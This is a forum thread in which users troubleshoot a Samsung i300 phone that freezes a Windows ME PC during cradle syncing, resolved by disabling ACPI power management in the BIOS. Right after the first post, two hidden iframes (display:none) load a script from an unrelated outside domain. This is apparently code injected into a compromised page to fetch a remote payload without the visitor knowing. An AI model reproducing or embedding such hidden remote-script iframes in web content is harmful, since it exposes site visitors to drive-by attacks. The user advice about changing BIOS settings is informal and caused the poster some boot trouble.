+ Reply to Thread

HELP with syncing

I just got an i300, and have never had a pda before-

I tried to hook the cradle up to my pc (win ME) tonight so i could get Blazer on the i300.

Thing is, my comp will boot up and run fine with the cradle connected to the serial port, but whenever i put the phone in the cradle, the computer just FREEZES (cant click anything, no scrolling, etc) until I take it out of the cradle, in which case is acts normal again.

This will also happen if i try to boot the PC with the phone sitting in the cradle- it wont boot, just freezes.

I have the palm desktop software that came with the phone installed, but i may have not done it right with the users/passwords,etc.

What am I doing wrong?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Lightbulb Here's the fix...

aaaaa haaaaaaaaa my friend!!!! i h ave had the EXACT SAME PROBLEM!!!! there is an easy fix! go here and read thru this post, and click on the links that you see. this is basically a conflict with the ACPI in the computer.. you wil need to go into your BIOS on your PC and disable the ACPI,, which is the power management feature..

when you pc freezes, do the ctrl/alt/del to bring up the box and i betcha you will see "MGSRV32 not responding"? if so, then its the problem i had.

go here for that issue and read about it..

i must press the issue that you read it and dont skim thru it.. it will tell you why you have to do these steps...

i sent this in to the samsung tech (level 2 support) and he had the same problem also. his pc froze up on him with the ACPI installed...

you may even want to diasble your screensaver also...

let me know what you find out!

thanks alot for your help- i would *never* have gotten anywhere with this bug otherwise

i read through the posts- so what was it that solved your problem, the SOFT RESET, or going into your PC's bios and changing the power-save?

what happens to the computer's power-save feature ifyou disable ACPI in bios?

also- how do you soft-rest the i300? is all this in the PDF manual?

Administrator

Arrow

no soft resets needed.. you will need to turn off your power management in the BIOS... do you kow how to get into yor bios? for me ( i have an hp),, i think i hit F8 as its booting up... that will take me to the bios...

im not sure what the power management is doing to affect the phones cradle, but it does affect it...

a soft reset is simply used by pushing the reset button in the back of the phone with the pin on thr stylus...

the power managemebnt wont do anything to the PC.. its manily for laptops.. computers that uselimited power sources (i.e. batteries.. etc). it will not harm your pc in anyway...

as you can see on the windoze FAQ site, they suggest you turnit off...

did you do the ctrl/alt/del and bring up the screen and saw the "mgsrv32 not responding" error when the pc was freezing?

I read through that Microsoft page re: the power management, but it was written for win95, and my win ME setup is pretty different than whats listed

i wasnt able to find a place where i could "uncheck" advanced power manangement-

any thoughts?

Administrator

Arrow

did you go into your bios or the control panel? im sure you could get into your bios and see it... but i only have win 98SE...

whoa-

I'm really lucky to be here right now!

I went into my BIOS and just set ACPI to off, then hit f10-save&exit.

seemed pretty painless.. BUT

when it started booting up it started detecting tons of new hardware and installing the software for it- IRQ, motherboard stuff, etc- really scary stuff.

then it would just hit my wallpaper in low-res mode and just sit there. nothing.

i shut down and rebotted a few times, same thing- it was looking like i was screwed.. the last time it kinda starting booting and gave me my network login, but then said i had some screen imageing software error, and put my into control panel, which i closed and now it all seems to work fine-

forgot to plug the cradle in during all that- im booting down and plugging it in- trying again

got my fingers crossed i come back..

Administrator

Arrow

yeah that low res had me scared too.. i ended up reformatting my whole drive as i though i messed something.. but it was that blasted power management thingy causing all the problems....

my fingers crossed also...

WOO HOO

i shut down the comp, and got this scary striped screen.

had to hold the power button for awhile. booted backup OK, then shutdown again, no probs.

plugged the cradle in, and booted.

W O R K S!

I actually did a hotsync and apparently now have blazer on my i300!!!!

(you have to have the hotsync app running in your systray in order for it towork when you press the button on the cradle)

SWEEEET!

thanks for all your help!!

OK, totally unrelated to getting blazer, but I found this freakin phenomenon on my previous win98 SE install. It was driving me crazy and I couldn't figure out what exactly was going on. Same thing was occuring, and I'm just now understanding what the dealeo was.

Thanks man, I was describing it to others in the IS shop and they thought it was just my machine (which is was) but it was just the ACPI. I went through all KINDS of configuration backflips, handstands and cartwheels to fix it....and it was just power management all along.

Thanks anyway....I'll know how to deal with it if it ever occurs again.

dee
    oh, you're supposed to READ the manual....

Administrator

Arrow

glad to know you guys are back in bizz.. and its nice to know i was not the only one to havre this issue...

(you have to have the hotsync app running in your systray in order for it to work when you press the button on the cradle)
    heehe.. yes that is absolutely correct! :p

now go to palm.com and dl the desktop 4.0.1 !!